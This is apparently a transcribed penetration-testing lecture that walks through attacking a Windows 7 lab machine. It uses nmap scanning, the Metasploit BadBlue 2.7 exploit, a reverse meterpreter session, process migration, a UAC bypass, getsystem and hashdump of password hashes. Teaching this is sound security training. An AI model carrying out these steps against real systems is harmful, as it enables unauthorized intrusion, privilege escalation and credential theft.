In previous session, we will discuss about system software vulnerability. Now, in this session, we will discuss about the application software vulnerability and using that particular vulnerability, how to penetrate inside a Windows machine. Now, consider that our target IP address is 10.35.1.199. Okay. So, let us start from the scanning part. So, first we will perform a port scanning nmap -t4 then -p. For the time being, I am performing the port scan for port 12000. Then the IP address 10.35.1.199. Okay, port 80 is open, HTTP service is running, port 135 is also open, 139445 all TCP port are open. Now, perform a service scan nmap timing option -t4 then -sv for service scan, then the IP address 10.35.1.199. So, for better visualization, we are performing service scan and also to know the details of the service means what particular version of the service is running in the target machine. Okay, here is the result. In port 80, HTTP service is running and the version of the HTTP service is bad blue HTTPD 2.7. From the experience, we know that this service bad blue HTTPD 2.7 is a vulnerable service and this service is basically used to transfer file. Now, we will exploit the vulnerability of the HTTP service of the particular version bad blue HTTPD 2.7. Let us start Metasploit framework. Now, in Metasploit framework, search for the exploit related to the bad blue service. So, we got two exploit. One is exploit /windows/http/badblue_ext_overflow and the disclosure date is in 2003 and rank is great. And second one is exploit /windows/http/badblue_passthrough. Disclosure date is 2007 and rank is great. And in description we clearly see that this is for the bad blue version 2.7. So, we will use this particular exploit. Now, using show options command, we can see all the option which we need to set. So, we need to set our host. So, use the command set, then our host, then the target machine IP address is 10.35.1.199 and our port is already set as 80 and HTTPD bad blue service is also running in port 80. So, no need to change our port. Now, use the command exploit. Meterpreter session 1 is opened with the host machine 10.35.1.198 using the port 4444, and we got the meterpreter session. Now, by using the command sysinfo, we can check the information of the target machine. It is Windows 7. Great. So, by using the vulnerability of the application software BadBlue 2.7, we successfully exploit the target system. Now, from the meterpreter session, we can execute lots of command which is available in meterpreter. By typing help, we can check all the available command. One of the important command is hash dump. By using the command hash dump, we can dump the content of the SAM database, that means the password of the target machine. But in this scenario, hash dump is not working. What is the reason? Now check the privilege of this user. So, the server username is win then u07c2k something then /exploiter. So, this session do not have the administrative privilege. So, to get the to execute the hash dump command, we need to escalate the administrative privilege first. So, now before getting the administrative privilege, I do one thing, I simply migrate the process into any other legitimate and stable process. So, by typing the command ps, we can get all the process list. See, here is all the process list with their process ID and parent process ID. So, now I am going to migrate the process into IEExplorer.exe with the process ID 2176. So, the command is migrate then process ID 2176. See, migration completed successfully. Now, send this meterpreter session in background by using the command background. Now, check all the meterpreter session. So, there is only one meterpreter session with the session ID 2 and it do not have the administrative privilege. Now, for further to get the administrative privilege, we use some post exploit related to the term bypass UAC. So, search for all the available exploit with the term bypass UAC. Now, suppose I want to use the first one. Now, by using the command show options, we can check all the options we need to set within this particular exploit. So, now see, we need to set the session. Now, we want to send the session ID 2 with the administrative privilege. So, set session as 2. Now, see, all the options are set. Now, use the command exploit. started the reverse TCP handler with the IP 10.35.1.198 using the port 4444 and meter preset session 3 is open. Now check the privilege of this particular session by using the command get UID. Now still it do not have the administrative privilege. Now use the command get system. Got system via technique 1 in memory admin. Now check the privilege of this particular session. Now see, we got the system privilege, that means the administrative privilege. Now use the command hash dump and see, we got the hash value of the password of the target machine. So this way we can also escalate the privilege of the target machine. Now in the next session we will discuss about the social engineering attack by using the exploit or payload available in the Metasploit framework.